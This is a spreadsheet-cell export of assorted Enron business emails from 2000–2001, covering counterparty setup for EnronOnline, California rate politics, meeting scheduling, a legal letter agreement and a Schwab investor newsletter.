---------------------- Forwarded by David W Delainey/HOU/ECT on 05/17/2000 _x000D_
08:35 AM ---------------------------_x000D_
_x000D_
_x000D_
Jere C Overdyke_x000D_
05/17/2000 07:48 AM_x000D_
To: David W Delainey/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Producer Insurance Targets  _x000D_
_x000D_
I was out of town last week on vacation.  The peaker project is moving _x000D_
ahead.  George Carrick and John met last week regarding upstream activities.  _x000D_
No final resolution. I have a voice mail in to John and will get things _x000D_
worked out this week.  The most important issue is to get into market place _x000D_
and test product with another transaction._x000D_
_x000D_
Jere_x000D_
</t>
  </si>
  <si>
    <t>Thu, 8 Jun 2000 08:38:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'bryan.hull@enron.com', "o'neal.winfree@enron.com", 'david.baumbach@enron.com'})</t>
  </si>
  <si>
    <t>Hoop it up</t>
  </si>
  <si>
    <t>I need a number where you can be reached on Friday evening.  I will be _x000D_
getting the schedule after work on Friday and will call and let you know when _x000D_
and where our games will be._x000D_
_x000D_
D</t>
  </si>
  <si>
    <t>Fri, 23 Mar 2001 03:25:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: EOL approvals, 3-20-01 _ GCP (US) Response</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
Yes, GCP provides the links to establish the correlation between the parent _x000D_
and child for our downstream systems._x000D_
GCP procedure is to create Counterparty names that reflect either the _x000D_
Tradename / Division name or Parent Name  - - not both simultaneously._x000D_
(Although, we have broken that rule for Legal in the past.) This defeats the _x000D_
purpose of using a Tradename._x000D_
_x000D_
Best Rgds._x000D_
_x000D_
Samuel_x000D_
_x000D_
_x000D_
   _x000D_
_x000D_
_x000D_
From:  Stephanie Sever                                                        _x000D_
     03/23/2001 10:21 AM	_x000D_
	_x000D_
	_x000D_
	                           _x000D_
	_x000D_
_x000D_
To: Tana Jones/HOU/ECT@ECT_x000D_
cc: Samuel Schott/HOU/ECT@ECT, Walter Guidroz/NA/Enron, Tom _x000D_
Moran/Enron@EnronXGate, Lisa Lees/HOU/ECT@ECT _x000D_
Subject: Re: EOL approvals, 3-20-01 _ GCP (US) Response  _x000D_
_x000D_
Tana,_x000D_
 _x000D_
Please review the process below:_x000D_
_x000D_
With divisions,  EOL does request a new Password Application for the _x000D_
applicant reflecting the name as you noted below.  When the company is set up _x000D_
in the EOL database we link the company to the Parent and reference the CP _x000D_
ID.  Sam, please confirm, Global Counterparty also provides the links to _x000D_
establish correlation between the parent and child for our downstream systems._x000D_
_x000D_
Let me know if this is the appropriate steps that you would like to see.  _x000D_
_x000D_
Thanks,_x000D_
Stephanie    _x000D_
_x000D_
_x000D_
From: Tana Jones on 03/22/2001 06:03 PM_x000D_
To: Samuel Schott/HOU/ECT@ECT, Stephanie Sever/HOU/ECT@ECT_x000D_
cc: Walter Guidroz/Enron@EnronXGate, Tom Moran/Enron@EnronXGate _x000D_
Subject: Re: EOL approvals, 3-20-01 _ GCP (US) Response  _x000D_
_x000D_
Sam &amp; Stephanie,_x000D_
_x000D_
Re:  Cargill Ferrous International_x000D_
_x000D_
It was my understanding with the EOL Team that all divisions would have the _x000D_
legal incorporated entity as part of the name.  Stephanie, I my preference is _x000D_
to kick their Password Application back and get them to change it to read _x000D_
something like "Cargill Ferrous International, a division of Cargill, Inc."  _x000D_
or "Cargill, Inc. acting through its Cargill Ferrous International Division"._x000D_
_x000D_
_x000D_
_x000D_
	Samuel Schott_x000D_
	03/21/2001 01:58 PM_x000D_
		_x000D_
		 To: Walter Guidroz/ENRON@enronXgate @ ENRON, Karen Lambert/HOU/ECT@ECT, Tana _x000D_
Jones/HOU/ECT@ECT, Mark Taylor/HOU/ECT@ECT, Brant _x000D_
Reves/ENRON@enronXgate@ENRON, Debbie R Brackett/HOU/ECT@ECT, David _x000D_
Hardy/LON/ECT@ECT, Lesli Campbell/ENRON@enronXgate@ENRON, Cynthia _x000D_
Clark/ENRON@enronXgate@ENRON, Enron Europe Global Contracts and _x000D_
Facilities@ENRON, Enron Europe Global CounterParty/LON/ECT@ECT, Stephanie _x000D_
Sever/HOU/ECT@ECT, Tom Moran/ENRON@enronXgate@ENRON, Claudia _x000D_
Clark/HOU/ECT@ECT, William S Bradford/ENRON@enronXgate@ENRON, Lisa _x000D_
Lees/HOU/ECT@ECT, Juana Fayett/Corp/Enron@Enron, Jana Morse/Corp/Enron@Enron, _x000D_
Trang Le/HOU/ECT@ECT, Paul Maley/LON/ECT@ECT, Sonya Clarke/LON/ECT@ECT, Tim _x000D_
Davies/LON/ECT@ECT, Karen O'Day/NA/Enron@Enron, Tanya _x000D_
Rohauer/ENRON@enronXgate@ENRON, Kelly Lombardi/NA/Enron@Enron, Brian _x000D_
Lindsay/Enron Communications@Enron Communications@ENRON, EOL Call _x000D_
Center@ENRON, Bernice Rodriguez/HOU/ECT@ECT, Bill D Hare/HOU/ECT@ect, Amy _x000D_
Heffernan/Enron Communications@Enron Communications@ENRON, Molly LaFuze/Enron _x000D_
Communications@Enron Communications@ENRON, Danny Clark/Enron _x000D_
Communications@Enron Communications@ENRON_x000D_
		 cc: _x000D_
		 Subject: Re: EOL approvals, 3-20-01 _ GCP (US) Response_x000D_
_x000D_
Any GCP adjustments will be highlighted in red._x000D_
_x000D_
Attn. GCP_London:_x000D_
There's a new EOL Counterparty listed in the UK. Please respond._x000D_
_x000D_
 _x000D_
_x000D_
Best Rgds._x000D_
_x000D_
Samuel x3-9890_x000D_
ENW_GCP_x000D_
_x000D_
_x000D_
_x000D_
From: Walter Guidroz/ENRON@enronXgate on 03/20/2001 05:30 PM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ntracts and Facilities@ENRON, Enron Europe Global _x000D_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NRON, Bernice Rodriguez/HOU/ECT@ECT, Bill D _x000D_
Hare/HOU/ECT@ect, Amy Heffernan/Enron Communications@Enron Communications, _x000D_
Molly LaFuze/Enron Communications@Enron Communications, Danny Clark/Enron _x000D_
Communications@Enron Communications_x000D_
cc:  _x000D_
Subject: EOL approvals, 3-20-01_x000D_
_x000D_
Please see attached._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 7 Dec 2000 04:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>TURN's Rate Stabilizaton Proposal</t>
  </si>
  <si>
    <t>----- Forwarded by Jeff Dasovich/NA/Enron on 12/07/2000 12:38 PM -----_x000D_
_x000D_
	Roger Yang@EES_x000D_
	12/07/2000 12:36 PM_x000D_
		 _x000D_
		 To: Gordon Savage/HOU/EES@EES, Scott Stoness/HOU/EES@EES, James W _x000D_
Lewis/HOU/EES@EES, Dennis Benevides/HOU/EES@EES_x000D_
		 cc: Mona Petrochko, Jeff Dasovich/NA/Enron@Enron, Susan J _x000D_
Mara/NA/Enron@ENRON, Sandra McCubbin/NA/Enron@Enron_x000D_
		 Subject: TURN's Rate Stabilizaton Proposal_x000D_
_x000D_
In a non-descriptive article in today's SF Chronicle, an article reports on _x000D_
some TURN plan to basically take the assets retained by the utilities and use _x000D_
the assets to deliver 5 cent energy to customers.  I imagine that TURN's plan _x000D_
only covers small customers because there is obviously not enough capacity _x000D_
for all customers.  Whereas, we have seen the utility's attempts to get the _x000D_
assets at below market prices in the past, it looks like TURN may be trying _x000D_
to maneuver to get the assets below market for its customers.  This leaves _x000D_
either the C&amp;I or utility shareholders holding the bag for undercollections.  _x000D_
I am sure that this is just some posturing, but CLECA/CMTA needs to be on top _x000D_
of this issue so that they don't get stuck.  It would be a double whammy for _x000D_
CLECA/CMTA customers, because not only would they see the higher market _x000D_
prices, but would have to bear a burden of undercollections that are not _x000D_
offset by an appropriate valuation of retained assets._x000D_
_x000D_
We will need Government Affairs to stay on top of this issue for us._x000D_
_x000D_
Roger</t>
  </si>
  <si>
    <t>Tue, 15 May 2001 12:29:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'e.bulletin@schwab.com'})</t>
  </si>
  <si>
    <t>May 2001 e.Bulletin</t>
  </si>
  <si>
    <t>=09=09=09[IMAGE]=09_x000D_
=09[IMAGE]=09Dear e.Bulletin Subscriber,_x000D_
=09=09_x000D_
=09=09To improve your email experience, we have enhanced your Schwab e.Bull=_x000D_
etin and=20_x000D_
Email Alerts. You will now receive them in a colorful, easy-to-read format=_x000D_
=20_x000D_
with added functionality. For example your e.Bulletin, shown below, include=_x000D_
s=20_x000D_
a table of contents for easier navigation. We hope you enjoy your enhanced=_x000D_
=20_x000D_
services!_x000D_
=09=09_x000D_
=09=09If you prefer to receive your e.Bulletin, and all your Email Alerts, =_x000D_
in plain=20_x000D_
text format, please click here.=09[IMAGE]=09_x000D_
[IMAGE]=09[IMAGE]=09[IMAGE]=09[IMAGE]=09[IMAGE]_x000D_
=20_x000D_
?=09 Schwab Signature Services=09 May 2001=09??_x000D_
=09=09=09[IMAGE]_x000D_
=09=09=09_x000D_
_x000D_
=09 In this Edition=20_x000D_
=09_x000D_
=09_x000D_
=09_x000D_
=09[IMAGE]_x000D_
=09  Schwab Market Update=20_x000D_
=09_x000D_
=09_x000D_
=09[IMAGE]_x000D_
=09  Perspectives=20_x000D_
=09_x000D_
=09_x000D_
=09[IMAGE]_x000D_
=09  Signature Investor's Toolbox=20_x000D_
=09_x000D_
=09_x000D_
=09[IMAGE]_x000D_
=09  News and Announcements=20_x000D_
=09_x000D_
=09_x000D_
=09=09Schwab Signature Services e.Bulletin=09Photo_x000D_
_x000D_
=09=20_x000D_
=09_x000D_
=09_x000D_
=09 Schwab  Market Update=20_x000D_
=09_x000D_
=09_x000D_
=09_x000D_
=09_x000D_
=09Daily    Market Recap=20_x000D_
=09_x000D_
=09 Read about what happened in the market today* in the  Daily Market Reca=_x000D_
p._x000D_
=09_x000D_
=09 * The content on this page is updated daily, after the market close.=20_x000D_
Therefore, no matter when you click on this link, you will get the most=20_x000D_
current Daily Market Recap. Save this e.Bulletin and get a new market recap=_x000D_
=20_x000D_
at the end of each business day. =20_x000D_
=09_x000D_
=09_x000D_
=09_x000D_
=09_x000D_
=09April    Market Summary=20_x000D_
=09_x000D_
=09 Read about what happened in the market last month in the  April Market=_x000D_
=20_x000D_
Summary.=20_x000D_
=09_x000D_
=09_x000D_
=09_x000D_
=09_x000D_
=09Return to Top =20_x000D_
=09_x000D_
=09_x000D_
=09_x000D_
=09[IMAGE]_x000D_
=09=20_x000D_
=09_x000D_
=09_x000D_
=09 Perspectives  =20_x000D_
=09_x000D_
=09_x000D_
=09[IMAGE]_x000D_
=09  From Charles R. Schwab: Surviving a Down Market=20_x000D_
=09_x000D_
=09_x000D_
=09[IMAGE]_x000D_
=09  Marriage Penalty: The Taxing Side of Marriage=20_x000D_
=09_x000D_
=09_x000D_
=09[IMAGE]_x000D_
=09  Section 529 Plans: Can They Help You Pay for College?=20_x000D_
=09_x000D_
=09_x000D_
=09_x000D_
=09_x000D_
=09[IMAGE]_x000D_
=09_x000D_
=09  From Charles R. Schwab:    Surviving a Down Market =20_x000D_
=09_x000D_
=09 In this timely excerpt from one of his books, Charles Schwab describes =_x000D_
what=20_x000D_
actions to take (or not to take) when markets are declining.=20_x000D_
=09_x000D_
=09_x000D_
=09_x000D_
=09_x000D_
=09Read the Full Article ??|??   Return to Top =20_x000D_
=09_x000D_
=09_x000D_
=09_x000D_
=09[IMAGE]_x000D_
=09_x000D_
=09  Marriage Penalty:    The Taxing Side of Marriage=20_x000D_
=09_x000D_
=09 After the vows, the ring and the champagne come the.......taxes! The=20_x000D_
so-called "marriage tax" was created when one-income households were the=20_x000D_
norm. Unfortunately, the tax code has not kept pace with changes in society=_x000D_
.=20_x000D_
This article explains how the marriage tax can affect your household=20_x000D_
finances.=20_x000D_
=09_x000D_
=09_x000D_
=09_x000D_
=09_x000D_
=09Read the Full Article ??|??   Return to Top =20_x000D_
=09_x000D_
=09_x000D_
=09_x000D_
=09[IMAGE]_x000D_
=09_x000D_
=09  Section 529 Plans:    Can They Help You Pay for College? =20_x000D_
=09_x000D_
=09 Saving for college tuition is a big worry for parents. Section 529 of t=_x000D_
he=20_x000D_
IRS Code was designed to help families save for college costs. Here's an=20_x000D_
analysis of what Section 529 means for you.  =20_x000D_
=09_x000D_
=09_x000D_
=09_x000D_
=09_x000D_
=09Read the Full Article ??|??   Return to Top =20_x000D_
=09_x000D_
=09_x000D_
=09_x000D_
=09[IMAGE]_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09 Looking for Nasdaq Level II data?_x000D_
=09=09_x000D_
=09=09Learn more about Schwab StreetSmart Proc by logging into the Signatur=_x000D_
e=20_x000D_
Services Center._x000D_
=09=09_x000D_
=09=09 Go_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09May Trading Quiz_x000D_
=09=09_x000D_
=09=09See how you stack up against other Schwab investors. =20_x000D_
=09=09_x000D_
=09=09Take this  quick quiz!_x000D_
=09=09_x000D_
=09=09 Go_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09The Proactive Investor's Calendar_x000D_
=09=09_x000D_
=09=09Check out our calendar of upcoming events, key economic indicators an=_x000D_
d what=20_x000D_
to think about in the month ahead._x000D_
=09=09_x000D_
=09=09 Go_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09Coming Soon! New Magazine from Women Investing Now_x000D_
=09=09_x000D_
=09=09Watch your mailbox! On Investing - Smart Strategies for Women Investo=_x000D_
rs will=20_x000D_
be arriving in May. Click Go to learn more about Women Investing Now._x000D_
=09=09_x000D_
=09=09Go_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09_x000D_
_x000D_
=09=09Signature Investor's     Toolbox=20_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09[IMAGE]_x000D_
=09=09Smarter Cash Management=20_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09[IMAGE]_x000D_
=09=09  Stay Up-to-date on Your Mutual Funds=20_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09[IMAGE]_x000D_
=09=09  Email Alerts Keep You Up-to-the-minute=20_x000D_
=09=09=09_x000D_
=09=09=09[IMAGE]_x000D_
=09=09  Smarter     Cash Management=20_x000D_
=09=09_x000D_
=09=09 Your everyday cash has earning potential. That's why we created the =_x000D_
Schwab=20_x000D_
Access=0FT account. This account puts powerful cash management features at =_x000D_
your=20_x000D_
fingertips, all for no monthly fee. We've made changes recently, providing=_x000D_
=20_x000D_
more-detailed account balance information and streamlining the account's=20_x000D_
transaction history. We've also improved the navigation on schwab.com, maki=_x000D_
ng=20_x000D_
it faster, with fewer clicks to get the information you need._x000D_
=09=09_x000D_
=09=09Log in to your Schwab Access account today: www.schwab.com._x000D_
=09=09_x000D_
=09=09Don't have an Access account? Learn more or request an application: =_x000D_
=20_x000D_
www.schwab.com/access._x000D_
=09=09_x000D_
=09=09 Schwab Access is not a bank checking account and is not FDIC insured=_x000D_
.  =20_x000D_
=09=09_x000D_
=09=09=09_x000D_
=09=09Return to Top  =09_x000D_
=09=09=09[IMAGE]_x000D_
=09=09  Stay Up-to-date on     Your Mutual Funds=20_x000D_
=09=09_x000D_
=09=09Get news, analyses and data directly from leading fund companies* wit=_x000D_
h our=20_x000D_
new DirectDetail=0FT service on schwab.com. You'll find commentaries from=_x000D_
=20_x000D_
portfolio managers, insights on top ten holdings, and analyses of investmen=_x000D_
t=20_x000D_
strategies, for example._x000D_
=09=09_x000D_
=09=09Together with Morningstar=0FT data already on schwab.com, DirectDetai=_x000D_
l provides=20_x000D_
the insights to help you make more informed investment decisions =0F- all i=_x000D_
n one=20_x000D_
place._x000D_
=09=09_x000D_
=09=09*DirectDetail is currently available for six leading mutual fund comp=_x000D_
anies:=20_x000D_
Janus, American Century Investments, INVESCO Funds, Firsthand Funds,=20_x000D_
SchwabFunds (launches 6/01) and Dreyfus._x000D_
=09=09_x000D_
=09=09For a prospectus containing more complete information, such as fees a=_x000D_
nd=20_x000D_
expenses, call Schwab at 1-800-435-4000. Read the prospectus carefully befo=_x000D_
re=20_x000D_
investing._x000D_
=09=09=20_x000D_
=09=09_x000D_
=09=09=09_x000D_
=09=09More information ??|??   Return to Top  =09_x000D_
=09=09=09[IMAGE]_x000D_
=09=09  Email Alerts     Keep You Up-to-the-minute=20_x000D_
=09=09_x000D_
=09=09 Schwab's Email Alerts are an easy way to monitor your investments an=_x000D_
d keep=20_x000D_
track of financial markets. You just select the information you want to=20_x000D_
receive and we'll send it to you regularly via email. The Alerts Wizard wil=_x000D_
l=20_x000D_
help you pick the Email Alerts most appropriate for your financial needs.=_x000D_
=20_x000D_
There are over 35 Email Alerts from which to choose, including:=20_x000D_
=09=09_x000D_
=09=09Rapid Price Alerts, Earnings Announcements and News Alerts =0F- Signa=_x000D_
ture=20_x000D_
exclusive Alerts, all for specific securities that you select_x000D_
=09=09Market Updates and Commentary - Keep up with the latest market events=_x000D_
 and=20_x000D_
news =20_x000D_
=09=09Trade Confirmations and Notifications - timely information delivered =_x000D_
directly=20_x000D_
to your email inbox - no more calling or logging in needed to check your=20_x000D_
trade order status=20_x000D_
=09=09_x000D_
=09=09Using the new Alerts Wizard is easy. After clicking on the link, log =_x000D_
in and=20_x000D_
simply follow the prompts. The Wizard will suggest Email Alerts best suited=_x000D_
=20_x000D_
for your investing needs.=20_x000D_
=09=09_x000D_
=09=09=09_x000D_
=09=09   More information ??|??   Return to Top  =09_x000D_
=09=09=09[IMAGE]_x000D_
=20_x000D_
=09=09 News and    Announcements=20_x000D_
=09=09_x000D_
=09=09=09_x000D_
=09=09Calling All Options Traders!    New Pricing!=20_x000D_
=09=09_x000D_
=09=09 Schwab has simplified the pricing for options trades placed through=_x000D_
=20_x000D_
schwab.com and TeleBrokerc, our automated touch-tone phone service._x000D_
=09=09_x000D_
=09=09The new pricing structure will result in much lower fees for most aut=_x000D_
omated=20_x000D_
options transactions. The new commissions for these trades are: $29.95 for=_x000D_
=20_x000D_
the first contract; $2.00 for each additional contract on trades of less th=_x000D_
an=20_x000D_
30 contracts; or $1.75 on trades of 30 or more contracts._x000D_
=09=09_x000D_
=09=09To view the full options commission schedule, click here._x000D_
=09=09_x000D_
=09=09To place an option trade, go to www.schwab.com, or call TeleBroker at=_x000D_
=20_x000D_
1-800-272-4922. (Have your account number and PIN ready. Your phone PIN is=_x000D_
=20_x000D_
not the same as your Web password.)_x000D_
=09=09_x000D_
=09=09 Options carry a high level of risk and are not suitable for all inve=_x000D_
stors.=20_x000D_
Certain requirements must be met to trade options through Schwab. =20_x000D_
=09=09_x000D_
=09=09=09_x000D_
=09=09More information ??|??   Return to Top  =09_x000D_
=09=09=09[IMAGE]_x000D_
_x000D_
=09 To change your email address:_x000D_
=09Log on to the page that will allow you to update your email address secu=_x000D_
rely.=20_x000D_
For your protection, we are unable to accept instructions to change your=20_x000D_
email address sent in reply to this message._x000D_
=09_x000D_
=09_x000D_
=09_x000D_
=09The Schwab e.Bulletin is a complimentary subscription for our clients. I=_x000D_
f you=20_x000D_
would prefer not to receive this in the future:_x000D_
=091. Log on to your account._x000D_
=092. Under "My Alerts," check the box marked "delete" next to e.Bulletin a=_x000D_
nd=20_x000D_
then click "submit."_x000D_
=09_x000D_
=09_x000D_
=09_x000D_
=09For account service questions, please send a secure email by logging on =_x000D_
to=20_x000D_
your account._x000D_
=09_x000D_
=09_x000D_
=09_x000D_
=09To provide feedback about Schwab's e.Bulletin, please send all feedback=_x000D_
=20_x000D_
directly to online.editor@schwab.com_x000D_
=09_x000D_
=09_x000D_
=09_x000D_
=09We appreciate your comments!_x000D_
=09_x000D_
=09_x000D_
=09_x000D_
=09The Schwab e.Bulletin mailing list is managed and used exclusively by Ch=_x000D_
arles=20_x000D_
Schwab &amp; Co., Inc. Schwab does not sell or rent information about its=20_x000D_
customers to any third party._x000D_
=09_x000D_
=09Notice: All email sent to or from the Charles Schwab corporate email sys=_x000D_
tem=20_x000D_
may be retained, monitored, and/or reviewed by Schwab personnel._x000D_
=09_x000D_
=09, 2001 Charles Schwab &amp; Co., Inc. All rights reserved. Member SIPC/NYSE.=_x000D_
=20_x000D_
(0501-12852)._x000D_
=09_x000D_
=09_x000D_
=09=20_x000D_
[IMAGE]? [IMAGE]</t>
  </si>
  <si>
    <t>Thu, 12 Apr 2001 02:29:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Enron Credit Inc. ("ECI")</t>
  </si>
  <si>
    <t xml:space="preserve">Cheryl,_x000D_
_x000D_
Could we also get copies of the executed prime broker agreements (at least _x000D_
Bear).  London would like to take a look the agreements._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Tom_x000D_
_x000D_
_x000D_
From: Sara Shackleton@ECT on 04/12/2001 09:22 AM_x000D_
To: Cheryl Nelson/NA/Enron@Enron_x000D_
cc: Tom Doukas/NA/Enron@ENRON _x000D_
_x000D_
Subject: Enron Credit Inc. ("ECI")_x000D_
_x000D_
Cheryl:_x000D_
_x000D_
Can you please forward a copy of the ECI resolution(s) (or consent) which was _x000D_
used to establish the Bear account and Securites Loan Agreement?  We need to _x000D_
determine all products authorized for ECI trading.  Also, copies of Enron _x000D_
Credit Limited authorizations would be useful.  Thanks for your help._x000D_
_x000D_
Sara Shackleton_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3801a_x000D_
Houston, Texas  77002_x000D_
713-853-5620 (phone)_x000D_
713-646-3490 (fax)_x000D_
sara.shackleton@enron.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 24 Jan 2001 06:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: apb check out</t>
  </si>
  <si>
    <t xml:space="preserve">It's an Amerex deal. I've changed it._x000D_
_x000D_
Kate_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Kerri Thompson@ENRON_x000D_
01/24/2001 02:38 PM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: apb check out_x000D_
_x000D_
504017  not there deal_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 18 Sep 2000 05:56:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Tomorrow's GE phone call/ TODAY's meeting to prepare?</t>
  </si>
  <si>
    <t xml:space="preserve">Lisa,_x000D_
_x000D_
I inadvertently left you off the list.  Hope you can come._x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 09/18/2000 12:55 _x000D_
PM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Kay Mann                           09/18/2000 11:39 AM_x000D_
	_x000D_
_x000D_
To: Scott Dieball/ENRON_DEVELOPMENT@ENRON_DEVELOPMENt, Martin W _x000D_
Penkwitz/NA/Enron@Enron, Roseann Engeldorf/Corp/Enron@ENRON_x000D_
cc: Sheila Tweed/HOU/ECT@ECT _x000D_
_x000D_
Subject: Tomorrow's GE phone call/ TODAY's meeting to prepare?_x000D_
_x000D_
How about meeting in advance of tomorrow's 130 phone call to discuss the _x000D_
approach we want to take with GE?  _x000D_
_x000D_
I'm suggesting 400 this afternoon.  Please let me know how this works for you._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 24 Jan 2001 05:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>I'll check my billing! Thanks for the_x000D_
warning!_x000D_
_x000D_
Warm regards, and thanks for the book,_x000D_
_x000D_
Darrell_x000D_
_x000D_
______________________________________________x000D_
Darrell Duffie_x000D_
mail  GSB Stanford CA 94305-5015 USA_x000D_
phone 650 723 1976_x000D_
fax   650 725 7979_x000D_
email duffie@stanford.edu_x000D_
web   http://www.stanford.edu/~duffie/_x000D_
_____________________________________________</t>
  </si>
  <si>
    <t>Thu, 18 Jan 2001 09:07:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'karen.barbour@enron.com'})</t>
  </si>
  <si>
    <t>Re: EWC contracts summary</t>
  </si>
  <si>
    <t>Tx Please stay on top of this and pass on info to Bradford for inclusion in _x000D_
our overall Calif. analysis. Rick</t>
  </si>
  <si>
    <t>Thu, 20 Jul 2000 18:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'brian.redmond@enron.com', 'kay.chapman@enron.com', 'venita.coleman@enron.com'})</t>
  </si>
  <si>
    <t>QBR Meeting</t>
  </si>
  <si>
    <t xml:space="preserve">I think we have the wrong date and time on this one - the Upstream QBR is _x000D_
August 28th for an afternoon._x000D_
Regards_x000D_
Delainey_x000D_
---------------------- Forwarded by David W Delainey/HOU/ECT on 07/21/2000 _x000D_
01:20 AM ---------------------------_x000D_
_x000D_
_x000D_
Venita Coleman@ENRON_x000D_
07/20/2000 05:23 PM_x000D_
To: Julie A Gomez/HOU/ECT@ECT, Jean Mrha/NA/Enron@Enron, David W _x000D_
Delainey/HOU/ECT@ECT_x000D_
cc: Venita Coleman/Corp/Enron@Enron, Melissa Jones/NA/Enron@ENRON, Kay _x000D_
Chapman/HOU/ECT@ECT, Monica Jackson/Corp/Enron@ENRON _x000D_
Subject: QBR Meeting_x000D_
_x000D_
A meeting has been scheduled for Friday, July 28, 2000._x000D_
_x000D_
_x000D_
    Date:          July 28, 2000, Friday_x000D_
_x000D_
    Time:           9:30 am - 10:00 am _x000D_
_x000D_
    Location:    EB 3314 (Dave Delainey's office)_x000D_
_x000D_
    Topic:          Quarterly Business Review Meeting    _x000D_
_x000D_
_x000D_
Thanks,_x000D_
Venita_x000D_
</t>
  </si>
  <si>
    <t>Thu, 20 Apr 2000 04:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'david.roland@enron.com'})</t>
  </si>
  <si>
    <t>Re: letter agreement between EES and Enron Corp.</t>
  </si>
  <si>
    <t xml:space="preserve">Sara,_x000D_
_x000D_
I tried again to get comments from Gareth but had no luck.  Let's go ahead _x000D_
and print it out and get it signed.  Please be sure to insert Mark S. Muller _x000D_
as the signee for EES.  His title is Managing Director._x000D_
_x000D_
David_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Sara Shackleton@ECT_x000D_
04/17/2000 01:47 PM_x000D_
To: David Roland/HOU/EES@EES_x000D_
cc:  _x000D_
Subject: Re: letter agreement between EES and Enron Corp.  _x000D_
_x000D_
If the letter is alright, I can have it printed formally.  I never heard back _x000D_
from Gareth with respect to any comments.  Just let me know what you would _x000D_
like to do.  Sara_x000D_
_x000D_
_x000D_
_x000D_
David Roland@EES_x000D_
04/17/2000 01:41 PM_x000D_
To: Sara Shackleton/HOU/ECT@ECT_x000D_
cc: Gareth Bahlmann/HOU/ECT@ECT _x000D_
Subject: Re: letter agreement between EES and Enron Corp._x000D_
_x000D_
_x000D_
Sara,_x000D_
_x000D_
One more reminder for you regarding the letter agreement._x000D_
_x000D_
Thanks,_x000D_
David_x000D_
_x000D_
_x000D_
---------------------- Forwarded by David Roland/HOU/EES on 04/17/2000 01:40 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
David Roland_x000D_
04/13/2000 10:24 AM_x000D_
To: Sara Shackleton/HOU/ECT@ECT_x000D_
cc: Gareth Bahlmann/HOU/ECT@ECT _x000D_
Subject: Re: letter agreement between EES and Enron Corp.  _x000D_
_x000D_
_x000D_
Sara,_x000D_
_x000D_
We still need to get this letter agreement done for Hawaii.  Please give me a _x000D_
call when you have some time to discuss it._x000D_
_x000D_
David_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Sara Shackleton@ECT_x000D_
03/31/2000 04:47 PM_x000D_
Sent by: Kaye Ellis@ECT_x000D_
To: David Roland/HOU/EES@EES_x000D_
cc: Gareth Bahlmann/HOU/ECT@ECT _x000D_
Subject: Re: letter agreement between EES and Enron Corp.  _x000D_
_x000D_
Attached is the revised letter agreement between EES and Enron Corp._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
To: David Roland/HOU/EES@EES_x000D_
cc: Sara Shackleton/HOU/ECT@ECT, Gareth Bahlmann/HOU/ECT@ECT _x000D_
Subject: Re: letter agreement between EES and Enron Corp.  _x000D_
_x000D_
_x000D_
Sara and Gareth,_x000D_
_x000D_
We still need to finish this agreement and have it signed.  To my knowledge, _x000D_
it has not been completed and signed._x000D_
_x000D_
David_x000D_
_x000D_
_x000D_
_x000D_
   _x000D_
	Enron Energy Services_x000D_
	_x000D_
	From:  David Roland                           03/30/2000 06:11 PM_x000D_
	_x000D_
_x000D_
To: Sara Shackleton/HOU/ECT@ECT_x000D_
cc: Gareth Bahlmann/HOU/ECT@ECT _x000D_
Subject: Re: letter agreement between EES and Enron Corp.  _x000D_
_x000D_
_x000D_
Sara,_x000D_
_x000D_
I'm on someone else's computer - I'm having all sorts of e-mail problems _x000D_
today._x000D_
_x000D_
The business person on the  EES side to be signing this letter would be Mark _x000D_
S. Muller.  He is a Managing Director of EES LLC._x000D_
_x000D_
I don't necessarily have a problem with the description of the back-to-back _x000D_
obligations, but I'd like to know Gareth's opinion as to whether the language _x000D_
is too broad._x000D_
_x000D_
David_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Sara Shackleton@ECT_x000D_
03/30/2000 04:38 PM_x000D_
To: David Roland/HOU/EES@EES, Gareth Bahlmann/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: letter agreement between EES and Enron Corp._x000D_
_x000D_
Attached is a first stab at the agreement.  Please comment._x000D_
_x000D_
_x000D_
_x000D_
